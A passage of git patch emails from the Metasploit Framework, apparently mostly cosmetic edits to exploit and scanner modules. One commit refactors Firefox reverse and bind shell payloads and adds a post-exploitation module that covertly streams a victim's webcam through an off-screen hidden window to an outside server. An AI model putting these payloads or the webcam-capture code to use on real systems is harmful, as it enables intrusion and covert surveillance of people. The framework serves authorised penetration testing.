Metasploit4 < Msf::Auxiliary body = res.body success = true end - elsif res.code == 500 + elsif res case res.body when /<faultstring>(.*)<\/faultstring>/i faultcode = $1.strip @@ -116,16 +106,16 @@ class Metasploit4 < Msf::Auxiliary end if success - #Only stoor loot if MATCH is not selected - if datastore['MATCH'].empty? - print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to loot") - store_loot( + # Only store loot if MATCH is not selected + if datastore['MATCH'].blank? + loot = store_loot( "sap.getprocessparameters", "text/xml", rhost, res.body, ".xml" ) + print_good("#{rhost}:#{rport} [SAP] Process Parameters: Entries extracted to #{loot}") else name_match = Regexp.new(datastore['MATCH'], [Regexp::EXTENDED, 'n']) print_status("[SAP] Regex match selected, skipping loot storage") From 0ef2e07012081b47a560ca0c17c14fadc11889af Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 19 May 2014 08:59:54 -0500 Subject: [PATCH 347/853] Minor desc and status updates, cosmetic --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 2 +- modules/auxiliary/scanner/snmp/brocade_enumhash.rb | 4 ++-- modules/auxiliary/scanner/snmp/netopia_enum.rb | 2 +- modules/auxiliary/scanner/snmp/ubee_ddw3611.rb | 2 +- .../windows/antivirus/symantec_workspace_streaming_exec.rb | 6 +++--- 5 files changed, 8 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 4812b2a232..f22cfe9fa2 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -19,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The vulnerability exists in the DBVisitor.dll component, and can be abused through malicious requests to the ChartThemeConfig web service. This module can be used to extract the site - and projects usernames and hashes. + and project usernames and hashes. }, 'References' => [ diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb index b06f16ec29..92bca9cb55 100644 --- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb +++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary row.each { |val| @hashes << val.value.to_s } end - print_good("#{ip} Found Users & Password Hashes:") + print_good("#{ip} - Found user and password hashes:") end credinfo = "" @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/netopia_enum.rb b/modules/auxiliary/scanner/snmp/netopia_enum.rb index 44f87f1508..07a4840766 100644 --- a/modules/auxiliary/scanner/snmp/netopia_enum.rb +++ b/modules/auxiliary/scanner/snmp/netopia_enum.rb @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 68a59454ac..ab88d07bfb 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -152,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary rescue ::Interrupt raise $! rescue ::Exception => e - print_error("#{ip} error: #{e.class} #{e}") + print_error("#{ip} - Error: #{e.class} #{e}") disconnect_snmp end end diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb index 9e77e808f0..c7fe29df13 100644 --- a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb +++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb @@ -19,11 +19,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in Symantec Workspace Streaming. The vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the - as_agent.exe service, which allows to upload arbitrary files under the server root. - This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + as_agent.exe service, which allows for uploading arbitrary files under the server root. + This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order to achieve remote code execution. This module has been tested successfully on Symantec Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single - machine deployment, and also at the backend role in a multiple machines deployment + machine deployment, and also in the backend role in a multiple machine deployment. }, 'Author' => [ From dc0e649a10b7a5a706cbdb88992bd7d6c2d09fcf Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Mon, 19 May 2014 09:21:07 -0500 Subject: [PATCH 348/853] Clean up case statement --- modules/auxiliary/scanner/sap/sap_icm_urlscan.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 7c26bbd1dc..c8ece7ac37 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Auxiliary when 404 # Do not return by default, only display in verbose mode vprint_status("#{full_url} - not found (#{res.code})") - when 400,500 + when 400, 500 print_status("#{full_url} - produced a server error (#{res.code})") - when 301, 302, + when 301, 302 print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)") @valid_urls << full_url << "\n" when 307 From e26dee5e22ba0e7327580da2801f2cc3f913d7ad Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Mon, 19 May 2014 21:32:30 +0400 Subject: [PATCH 349/853] Update mybb_get_type_db.rb 19/05/2014 I deleted - #return Exploit::CheckCode::Unknown # necessary ???? --- modules/auxiliary/gather/mybb_get_type_db.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e007166e77..b96e7a1a64 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -65,7 +65,6 @@ class Metasploit3 < Msf::Auxiliary php_version = " PHP Version: #{php_version}".ljust(40) else php_version = " PHP Version: unknown".ljust(40) - #return Exploit::CheckCode::Unknown # necessary ???? end #Check Web-Server From b84379ab3b8d88895270c9c7928c550aad4cdb5e Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Mon, 19 May 2014 22:00:09 +0100 Subject: [PATCH 350/853] Note about EXE::Custom --- modules/exploits/windows/local/bypassuac_injection.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index e297bbe31e..3ec7214054 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -24,6 +24,8 @@ class Metasploit3 < Msf::Exploit::Local technique to drop only the DLL payload binary instead of three seperate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). + If specifying EXE::Custom your DLL should call ExitProcess() after starting + your payload in a seperate process. }, 'License' => MSF_LICENSE, 'Author' => [ From 7cabfacfa379269707099afddef3e4f84ca5b22b Mon Sep 17 00:00:00 2001 From: Jonas Vestberg <bugch3ck@users.noreply.github.com> Date: Tue, 20 May 2014 01:43:19 +0200 Subject: [PATCH 351/853] Test adobe_flash_pixel_bender_bof on Safari 5.1.7 Added browser-requirement for Safari after successful test using Safari 5.1.7 with Adobe Flash Player 13.0.0.182 running on Windows 7 SP1. --- .../exploits/windows/browser/adobe_flash_pixel_bender_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb index c29080ed3c..371489b0fd 100644 --- a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote { :source => /script|headers/i, :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF}, + :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::SAFARI}, :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } }, 'Targets' => From 8a9c005f13329673b790caec314bafeb05fa0231 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 20 May 2014 17:43:07 -0500 Subject: [PATCH 352/853] Add URL --- modules/auxiliary/admin/http/katello_satellite_priv_esc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb index 35d9cbef28..c6ccab6c40 100644 --- a/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb +++ b/modules/auxiliary/admin/http/katello_satellite_priv_esc.rb @@ -23,7 +23,8 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ ['CVE', '2013-2143'], - ['CWE', '862'] + ['CWE', '862'], + ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=970849'] ], 'DisclosureDate' => 'Mar 24 2014' ) From af415c941b2d6d61f87b70aaa5c39dcd41916bd4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 20 May 2014 18:44:28 -0500 Subject: [PATCH 353/853] [SeeRM #8803] Avoid false positives when checking fb_cnct_group --- modules/exploits/windows/misc/fb_cnct_group.rb | 3 --- 1 file changed, 3 deletions(-) diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 3c8a3deed1..7402cdb077 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -94,9 +94,6 @@ class Metasploit3 < Msf::Exploit::Remote opcode = data.unpack("N*")[0] version = data.unpack("N*")[1] if opcode == 3 # Accept - if [ 0xffff800b, 0xffff800c ].include?(version) - return Exploit::CheckCode::Vulnerable - end return Exploit::CheckCode::Detected end From b9464e626edf23821909d2db224c5e31cd86f3ad Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Wed, 21 May 2014 10:18:03 -0500 Subject: [PATCH 354/853] Delete unnecessary line --- modules/exploits/windows/misc/fb_cnct_group.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 7402cdb077..118d832d64 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -92,7 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote disconnect opcode = data.unpack("N*")[0] - version = data.unpack("N*")[1] if opcode == 3 # Accept return Exploit::CheckCode::Detected end From 14b796acbfcedbdd78d77aa5240d741ba9b1db1d Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Wed, 21 May 2014 15:32:29 -0500 Subject: [PATCH 355/853] First stab at refactoring webrtc mixin. --- .../remote/firefox_privilege_escalation.rb | 3 +- lib/msf/core/payload/firefox.rb | 33 +++++++ lib/msf/core/post.rb | 1 + lib/msf/core/post/webrtc.rb | 64 ++++++++++++++ .../extensions/stdapi/webcam/webcam.rb | 61 +------------ .../browser/firefox_proto_crmfrequest.rb | 2 + .../singles/firefox/shell_bind_tcp.rb | 19 ++--- .../singles/firefox/shell_reverse_tcp.rb | 9 +- .../singles/firefox/shell_reverse_tcp_ssl.rb | 36 ++++++++ .../singles/nodejs/shell_reverse_tcp_ssl.rb | 7 -- modules/post/firefox/gather/webcam_chat.rb | 85 +++++++++++++++++++ 11 files changed, 236 insertions(+), 84 deletions(-) create mode 100644 lib/msf/core/post/webrtc.rb create mode 100644 modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb create mode 100644 modules/post/firefox/gather/webcam_chat.rb diff --git a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb index b36e245414..0b39034603 100644 --- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb +++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb @@ -16,7 +16,8 @@ module Exploit::Remote::FirefoxPrivilegeEscalation # calling the "send" function, or by just returning the value in +js+ def js_exec(js) print_status "Running the privileged javascript..." - session.shell_write("[JAVASCRIPT]#{js}[/JAVASCRIPT]") + token = "[[#{Rex::Text.rand_text_alpha(8)}]]" + session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}") session.shell_read_until_token("[!JAVASCRIPT]", 0, datastore['TIMEOUT']) end diff --git a/lib/msf/core/payload/firefox.rb b/lib/msf/core/payload/firefox.rb index bdd10154a7..8921f0124a 100644 --- a/lib/msf/core/payload/firefox.rb +++ b/lib/msf/core/payload/firefox.rb @@ -16,6 +16,38 @@ module Msf::Payload::Firefox | end + # Javascript source of readUntilToken(s) + # Continues reading the stream as data is available, until a pair of + # command tokens like [[aBcD123ffh]] [[aBcD123ffh]] is consumed. + # + # Returns a function that can be passed to the #onDataAvailable callback of + # nsIInputStreamPump that will buffer until a second token is read, or, in + # the absence of any tokens, a newline character is read. + # + # @return [String] javascript source code that exposes the readUntilToken(cb) function + def read_until_token_source + %Q| + var readUntilToken = function(cb) { + Components.utils.import("resource://gre/modules/NetUtil.jsm"); + + var buffer = '', m = null; + return function(request, context, stream, offset, count) { + buffer += NetUtil.readInputStreamToString(stream, count); + if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) { + + if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) { + cb(m[2]); + buffer = ''; + } + } else if (buffer.indexOf("\\n") > -1) { + cb(buffer); + buffer = ''; + } + }; + }; + | + end + # Javascript source code of readFile(path) - synchronously reads a file and returns # its contents. The file is deleted immediately afterwards. # @@ -189,4 +221,5 @@ module Msf::Payload::Firefox (new ActiveXObject("WScript.Shell")).Run(cmd, 0, true); | end + end diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb index d9574910be..0e37cfb6dd 100644 --- a/lib/msf/core/post.rb +++ b/lib/msf/core/post.rb @@ -9,6 +9,7 @@ class Msf::Post < Msf::Module require 'msf/core/post_mixin' require 'msf/core/post/file' + require 'msf/core/post/webrtc' require 'msf/core/post/linux' require 'msf/core/post/osx' diff --git a/lib/msf/core/post/webrtc.rb b/lib/msf/core/post/webrtc.rb new file mode 100644 index 0000000000..d58c1ecf91 --- /dev/null +++ b/lib/msf/core/post/webrtc.rb @@ -0,0 +1,64 @@ +# -*- coding: binary -*- + +module Msf::Post::WebRTC + + # + # Connects to a video chat session as an answerer + # + # @param offerer_id [String] The offerer's ID in order to join the video chat + # @return void + # + def connect_video_chat(server, channel, offerer_id) + interface = load_interface('answerer.html') + api = load_api_code + + tmp_api = Tempfile.new('api.js') + tmp_api.binmode + tmp_api.write(api) + tmp_api.close + + interface = interface.gsub(/\=SERVER\=/, server) + interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) + interface = interface.gsub(/\=RHOST\=/, rhost) + interface = interface.gsub(/\=CHANNEL\=/, channel) + interface = interface.gsub(/\=OFFERERID\=/, offerer_id) + + tmp_interface = Tempfile.new('answerer.html') + tmp_interface.binmode + tmp_interface.write(interface) + tmp_interface.close + + found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path) + unless found_local_browser + raise RuntimeError, "Unable to find a suitable browser to connect to the target" + end + end + + + # + # Returns the webcam interface + # + # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html) + # @return [String] The HTML interface code + # + def load_interface(html_name) + interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) + interface_code = '' + ::File.open(interface_path) { |f| interface_code = f.read } + interface_code + end + + + # + # Returns the webcam API + # + # @return [String] The WebRTC lib code + # + def load_api_code + js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js') + api = '' + ::File.open(js_api_path) { |f| api = f.read } + api + end + +end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 436446b53b..31a5c1ef6e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -18,6 +18,7 @@ class Webcam include Msf::Post::Common include Msf::Post::File + include Msf::Post::WebRTC def initialize(client) @client = client @@ -195,66 +196,6 @@ class Webcam end end - - # - # Connects to a video chat session as an answerer - # - # @param offerer_id [String] The offerer's ID in order to join the video chat - # @return void - # - def connect_video_chat(server, channel, offerer_id) - interface = load_interface('answerer.html') - api = load_api_code - - tmp_api = Tempfile.new('api.js') - tmp_api.binmode - tmp_api.write(api) - tmp_api.close - - interface = interface.gsub(/\=SERVER\=/, server) - interface = interface.gsub(/\=WEBRTCAPIJS\=/, tmp_api.path) - interface = interface.gsub(/\=RHOST\=/, rhost) - interface = interface.gsub(/\=CHANNEL\=/, channel) - interface = interface.gsub(/\=OFFERERID\=/, offerer_id) - - tmp_interface = Tempfile.new('answerer.html') - tmp_interface.binmode - tmp_interface.write(interface) - tmp_interface.close - - found_local_browser = Rex::Compat.open_webrtc_browser(tmp_interface.path) - unless found_local_browser - raise RuntimeError, "Unable to find a suitable browser to connect to the target" - end - end - - - # - # Returns the webcam interface - # - # @param html_name [String] The filename of the HTML interface (offerer.html or answerer.html) - # @return [String] The HTML interface code - # - def load_interface(html_name) - interface_path = ::File.join(Msf::Config.data_directory, 'webcam', html_name) - interface_code = '' - ::File.open(interface_path) { |f| interface_code = f.read } - interface_code - end - - - # - # Returns the webcam API - # - # @return [String] The WebRTC lib code - # - def load_api_code - js_api_path = ::File.join(Msf::Config.data_directory, 'webcam', 'api.js') - api = '' - ::File.open(js_api_path) { |f| api = f.read } - api - end - end end; end; end; end; end; end diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 2b24b83cc1..e8f6441a73 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -67,9 +67,11 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending the malicious addon") send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' }) else + File.write('/tmp/ff.html', generate_html(target_info)) print_status("Sending HTML") send_response_html(cli, generate_html(target_info)) end + end def generate_html(target_info) diff --git a/modules/payloads/singles/firefox/shell_bind_tcp.rb b/modules/payloads/singles/firefox/shell_bind_tcp.rb index 9a91867fb7..1312b3c3fe 100644 --- a/modules/payloads/singles/firefox/shell_bind_tcp.rb +++ b/modules/payloads/singles/firefox/shell_bind_tcp.rb @@ -23,22 +23,14 @@ module Metasploit3 'Arch' => ARCH_FIREFOX, 'Handler' => Msf::Handler::BindTcp, 'Session' => Msf::Sessions::CommandShell, - 'PayloadType' => 'firefox', - 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + 'PayloadType' => 'firefox' )) end - # - # Constructs the payload - # - def generate - super + command_string - end - # # Returns the JS string to use for execution # - def command_string + def generate %Q| (function(){ Components.utils.import("resource://gre/modules/NetUtil.jsm"); @@ -59,16 +51,17 @@ module Metasploit3 } }; + #{read_until_token_source} + var clientListener = function(outStream) { return { onStartRequest: function(request, context) {}, onStopRequest: function(request, context) {}, - onDataAvailable: function(request, context, stream, offset, count) { - var data = NetUtil.readInputStreamToString(stream, count).trim(); + onDataAvailable: readUntilToken(function(data) { runCmd(data, function(err, output) { if(!err) outStream.write(output, output.length); }); - } + }) }; }; diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp.rb b/modules/payloads/singles/firefox/shell_reverse_tcp.rb index 92d32aa8c4..e3a8d572fe 100644 --- a/modules/payloads/singles/firefox/shell_reverse_tcp.rb +++ b/modules/payloads/singles/firefox/shell_reverse_tcp.rb @@ -6,6 +6,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' module Metasploit3 @@ -45,15 +46,16 @@ module Metasploit3 .createInstance(Components.interfaces.nsIInputStreamPump); pump.init(inStream, -1, -1, 0, 0, true); + #{read_until_token_source} + var listener = { onStartRequest: function(request, context) {}, onStopRequest: function(request, context) {}, - onDataAvailable: function(request, context, stream, offset, count) { - var data = NetUtil.readInputStreamToString(stream, count).trim(); + onDataAvailable: readUntilToken(function(data) { runCmd(data, function(err, output) { if (!err) outStream.write(output, output.length); }); - } + }) }; #{run_cmd_source} @@ -63,4 +65,5 @@ module Metasploit3 EOS end + end diff --git a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb new file mode 100644 index 0000000000..1a073d9fb5 --- /dev/null +++ b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb @@ -0,0 +1,36 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Firefox + include Msf::Sessions::CommandShellOptions + + def initialize(info={}) + super(merge_info(info, + 'Name' => 'Command Shell, Reverse TCP SSL (via Firefox XPCOM script)', + 'Description' => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API}, + 'Author' => ['joev'], + 'License' => BSD_LICENSE, + 'Platform' => 'firefox', + 'Arch' => ARCH_FIREFOX, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'firefox' + )) + end + + def generate + # reverse_connect(:ssl => true) + "" + end + +end diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 5e14658ae1..c6aa8cba84 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -30,13 +30,6 @@ module Metasploit3 )) end - # - # Constructs the payload - # - def generate - super + command_string - end - # # Returns the JS string to use for execution # diff --git a/modules/post/firefox/gather/webcam_chat.rb b/modules/post/firefox/gather/webcam_chat.rb new file mode 100644 index 0000000000..ee4450bde7 --- /dev/null +++ b/modules/post/firefox/gather/webcam_chat.rb @@ -0,0 +1,85 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'json' +require 'msf/core' + +class Metasploit3 < Msf::Post + + include Msf::Exploit::Remote::FirefoxPrivilegeEscalation + include Msf::Post::WebRTC + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Firefox Webcam Chat on Privileged Javascript Shell', + 'Description' => %q{ + This module allows streaming a webcam from a Firefox Privileged Javascript Shell. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'joev' ], + 'DisclosureDate' => 'May 13 2014' + )) + + register_options([ + OptBool.new('CLOSE', [false, "Forcibly close previous chat session", false]), + OptInt.new('TIMEOUT', [false, "End the chat session after this many seconds", -1]), + OptString.new('ICESERVER', [true, "The ICE server that sets up the P2P connection", 'wsnodejs.jit.su:80']) + ], self.class) + end + + def run + server = datastore['ICESERVER'] + offerer_id = Rex::Text.rand_text_alphanumeric(10) + channel = Rex::Text.rand_text_alphanumeric(20) + + result = js_exec(js_payload(server, offerer_id, channel)) + + if result.present? + print_status result + connect_video_chat(server, channel, offerer_id) + end + end + + def js_payload(server, offerer_id, channel) + interface = load_interface('offerer.html') + api = load_api_code + + interface.gsub!(/\=SERVER\=/, server) + interface.gsub!(/\=CHANNEL\=/, channel) + interface.gsub!(/\=OFFERERID\=/, offerer_id) + + if datastore['TIMEOUT'] > 0 + api << "; setTimeout(function(){window.location='about:blank'}, #{datastore['TIMEOUT']*1000}); " + end + + interface.gsub!('<script src="api.js"> </script>', "<script>#{api}</script>") + + url = if datastore['CLOSE'] + '"about:blank"' + else + '"data:text/html;base64,"+html' + end + + %Q| + (function(send){ + try { + var b64 = Components.utils.import("resource://gre/modules/Services.jsm").atob; + var AppShellService = Components + .classes["@mozilla.org/appshell/appShellService;1"] + .getService(Components.interfaces.nsIAppShellService); + + var html = "#{Rex::Text.encode_base64(interface)}"; + var url = "data:text/html;base64,"+html; + AppShellService.hiddenDOMWindow.open(url, "_self"); + AppShellService.hiddenDOMWindow.moveTo(-55555,-55555); + send("Streaming webcam..."); + } catch (e) { + send(e); + } + })(send); + |.gsub(/\s+/, '') + end + +end From 765419627bf9114df8a4eb97ab04d13df7c38b3f Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 21 May 2014 16:18:36 -0500 Subject: [PATCH 356/853] Demote datastore edits to info status SeeRM #8498 --- tools/msftidy.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 8c5d82458d..6c585dfd6e 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -471,9 +471,12 @@ class Msftidy error("Writes to stdout", idx) end - # do not change datastore in code + # You should not change datastore in code. For reasons. See + # RM#8498 for discussion, starting at comment #16: + # + # https://dev.metasploit.com/redmine/issues/8498#note-16 if ln =~ /(?<!\.)datastore\[["'][^"']+["']\]\s*=(?![=~>])/ - error("datastore is modified in code: #{ln}", idx) + info("datastore is modified in code: #{ln}", idx) end # do not read Set-Cookie header (ignore commented lines) From d9fbf861d2b74c5dc9241b6d51db015daa58b9f0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 21 May 2014 16:20:57 -0500 Subject: [PATCH 357/853] Add an environment option to suppress info msgs It's often you want counts of just WARN and ERROR messages, and don't want to spam yourself with INFO messages that you don't intend to address anyway. This is most often the case with CI, such as with https://travis-ci.org/todb-r7/metasploit-framework --- tools/msftidy.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index 6c585dfd6e..7d83eed8c2 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -11,6 +11,7 @@ require 'find' require 'time' CHECK_OLD_RUBIES = !!ENV['MSF_CHECK_OLD_RUBIES'] +SUPRESS_INFO_MESSAGES = !!ENV['MSF_SUPPRESS_INFO_MESSAGES'] if CHECK_OLD_RUBIES require 'rvm' @@ -91,6 +92,7 @@ class Msftidy # Display an info message. Info messages do not alter the exit status. # def info(txt, line=0) + return if SUPRESS_INFO_MESSAGES line_msg = (line>0) ? ":#{line}" : '' puts "#{@full_filepath}#{line_msg} - [#{'INFO'.cyan}] #{cleanup_text(txt)}" end From fa353e6bd953c9d8bccca6615cd2f9a220ccd2e4 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Thu, 22 May 2014 11:34:04 -0500 Subject: [PATCH 358/853] Add CVE, IBM ref for SameTime modules --- modules/auxiliary/gather/ibm_sametime_enumerate_users.rb | 5 +++++ modules/auxiliary/gather/ibm_sametime_room_brute.rb | 5 +++++ modules/auxiliary/gather/ibm_sametime_version.rb | 5 +++++ 3 files changed, 15 insertions(+) diff --git a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb index f11c345847..e6875e6d57 100644 --- a/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb +++ b/modules/auxiliary/gather/ibm_sametime_enumerate_users.rb @@ -24,6 +24,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3975' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true diff --git a/modules/auxiliary/gather/ibm_sametime_room_brute.rb b/modules/auxiliary/gather/ibm_sametime_room_brute.rb index cff9af79e1..80c1f7a1b3 100644 --- a/modules/auxiliary/gather/ibm_sametime_room_brute.rb +++ b/modules/auxiliary/gather/ibm_sametime_room_brute.rb @@ -23,6 +23,11 @@ class Metasploit3 < Msf::Auxiliary [ 'kicks4kittens' # Metasploit module ], + 'References' => + [ + [ 'CVE', '2013-3977' ], + [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201'] + ], 'DefaultOptions' => { 'SSL' => true diff --git a/modules/auxiliary/gather/ibm_sametime_version.rb b/modules/auxiliary/gather/ibm_sametime_version.rb index a8454f211d..d2754274d6 100644 --- a/modules/auxiliary/gather/ibm_sametime_version.rb +++ 